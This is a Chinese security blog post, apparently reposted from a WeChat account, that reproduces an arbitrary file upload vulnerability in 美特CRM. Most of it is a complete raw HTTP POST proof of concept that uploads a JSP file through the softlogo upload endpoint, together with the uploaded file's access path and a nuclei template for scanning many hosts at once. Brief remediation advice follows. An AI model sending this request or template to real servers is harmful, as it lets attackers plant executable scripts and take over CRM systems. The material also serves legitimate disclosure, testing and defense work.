美特crm 任意文件上传漏洞复现

admin
admin
admin
108847
文章
90
评论
2024年5月15日18:38:27评论8 views字数 3100阅读10分20秒阅读模式
 

01
0x01漏洞描述
美特crm /develop/systparam/softlogo存在任意文件上传,攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁!
美特crm 任意文件上传漏洞复现

02
0x02 漏洞复现 
POC如下所示:
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Content-Length: 693Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Cache-Control: max-age=0Connection: closeContent-Type: multipart/form-data; boundary=----qiioxrvqmpuuubhaotnuUpgrade-Insecure-Requests: 1------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="file"; filename="7ahrf590an.jsp"Content-Type: application/octet-stream<%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="key"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="form"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="field"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="filetitile"null------qiioxrvqmpuuubhaotnuContent-Disposition: form-data; name="filefolder"null------qiioxrvqmpuuubhaotnu--
链接地址如下所示:url+/userfile/default/userlogo/xxxxx.jsp
美特crm 任意文件上传漏洞复现

03
0x03nuclei批量检测
美特crm 任意文件上传漏洞复现

id: mt_crm_uploadinfo:  name: mt_crm_upload  author: recjl  severity: critical  description: description  reference:    - https://  tags: tagshttp:  - raw:      - |-        POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36        Content-Length: 691        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9        Cache-Control: max-age=0        Connection: close        Content-Type: multipart/form-data; boundary=----qiioxrvqmpuuubhaotnu        Upgrade-Insecure-Requests: 1        ------qiioxrvqmpuuubhaotnu        Content-Disposition: form-data; name="file"; filename="7ahrf590an.jsp"        Content-Type: application/octet-stream        <%out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>        ------qiioxrvqmpuuubhaotnu        Content-Disposition: form-data; name="key"        null        ------qiioxrvqmpuuubhaotnu        Content-Disposition: form-data; name="form"        null        ------qiioxrvqmpuuubhaotnu        Content-Disposition: form-data; name="field"        null        ------qiioxrvqmpuuubhaotnu        Content-Disposition: form-data; name="filetitile"        null        ------qiioxrvqmpuuubhaotnu        Content-Disposition: form-data; name="filefolder"        null        ------qiioxrvqmpuuubhaotnu--    matchers-condition: and    matchers:      - type: word        part: body        words:          - 7ahrf590an      - type: status        status:          - 200

 修复建议

1、对上传文件类型进行验证,除在前端验证外在后端依然要做验证,后端可以进行扩展名检测,重命名文件,MIME类型检测以及限制上传文件的大小等限制来防御,或是将上传的文件其他文件存储服务器中。

2、严格限制和校验上传的文件,禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限,防止木马执行。

3、对上传文件格式进行严格校验,防止上传恶意脚本文件;

4、严格限制上传的文件路径。

5、文件扩展名服务端白名单校验。

6、文件内容服务端校验。

7、上传文件重命名。

8、隐藏上传文件路径。

原文始发于微信公众号(爱喝酒烫头的曹操):【1day】美特crm 任意文件上传漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月15日18:38:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   美特crm 任意文件上传漏洞复现https://cn-sec.com/archives/2742752.html

发表评论

匿名网友 填写信息